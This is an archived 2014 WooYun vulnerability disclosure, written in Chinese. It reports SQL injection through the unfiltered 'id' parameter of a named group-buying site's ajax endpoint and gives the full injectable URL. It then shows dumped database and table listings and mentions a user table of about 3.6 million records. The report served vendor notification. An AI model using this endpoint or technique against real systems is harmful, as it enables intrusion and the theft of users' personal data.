乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-16: 细节已通知厂商并且等待厂商处理中 2014-05-16: 厂商已经确认,细节仅向厂商公开 2014-05-26: 细节向核心白帽子及相关领域专家公开 2014-06-05: 细节向普通白帽子公开 2014-06-15: 细节向实习白帽子公开 2014-06-30: 细节向公众公开
美女就是会骗钱,上次一美女同事吃完饭,跟我说她忘带钱包,要我打的送她回家,她拿钱还我,当我傻,那么远,我打的回来不要钱啊,又想占我便宜,下次再这样要求,我最少要她补我回来车费!
问题站点:
http://tuan.aili.com/
注射链接:
http://tuan.aili.com/ajax/system.php?id=17871&title=%5B%E4%B8%9C%E7%9B%B4%E9%97%A8%5D+%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E4%BB%85%E5%94%AE29%E5%85%83%2C%E4%BB%B7%E5%80%BC300%E5%85%83%E5%87%BB%E5%89%91%E4%BD%93%E9%AA%8C%E8%AF%BE1%E8%8A%82!%E5%9B%BD%E5%AE%B6%E7%BA%A7%E8%BF%90%E5%8A%A8%E5%91%98%E4%B8%93%E4%B8%9A%E6%8E%88%E8%AF%BE%2C%E4%B8%BA%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%B8%80%E6%A0%B7%E7%9A%84%E6%84%9F%E5%8F%97!%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E6%AC%A2%E8%BF%8E%E6%82%A8%E7%9A%84%E5%88%B0%E6%9D%A5!&team_id=57826&action=showbaidumap
由于对参数id没过滤,造成注射
库:
available databases [3]:[*] information_schema[*] test[*] tuan
当前库:tuan表:
Database: tuan[108 tables]+--------------------------+| order || user || accoutlog || address || advert || area_team || ask || biz_team || branch || brand_list || brands || business || card || cart || category || cenwor_tttuangou_regions || chosen || city || citylist || code || collect || coupon || cps360_order || cps_baidu || cps_baidu1130 || cps_duba || cpsorder || credit || ctrip_group_coupon || ctrip_group_detail || ctrip_group_detail_bk || ctrip_group_info || ctrip_group_info_bk || ctrip_group_order || daysign || daysign1 || del_order || ecs_region || express_cdp || feedback || flow || friendlink || fx_team || goods || groupon || groupon_coupon || groupon_order_list || hz_team || invite || logger_admin || lookoocps || lottery_list || mailer || manager_action || managers || navigation || news || order_comments || outsite_voucher || page || partner || partner116 || partner_gallery || pass || pay || paycard || picture || prize_ticket || prize_ticket_win || promotions || rebates_list || recharge_list || recomend_list || record_money || referer || refund_list || reg_message || salesman || searchkey || send_paycard_code || send_paycard_team || setcode || siyu_team || smssubscribe || subcate || subscribe || system || t_basic || team || team_detail || team_playshall || team_recycle || team_recycle0106 || toolsbind || topic || tuan800cps || vote_feedback || vote_feedback_input || vote_feedback_question || vote_options || vote_question || voucher || voucher_refund || voucherbk || yiqifa_order || ymh_team || zhaoshang || zsfeedback |+--------------------------+
随便跑了一个user表,360W数据没什么好说的,赶快修复吧听说爱丽有礼物~~~嘿嘿
礼物噢~~~
危害等级:高
漏洞Rank:18
确认时间:2014-05-16 18:31
看来这回又被脱干净了
暂无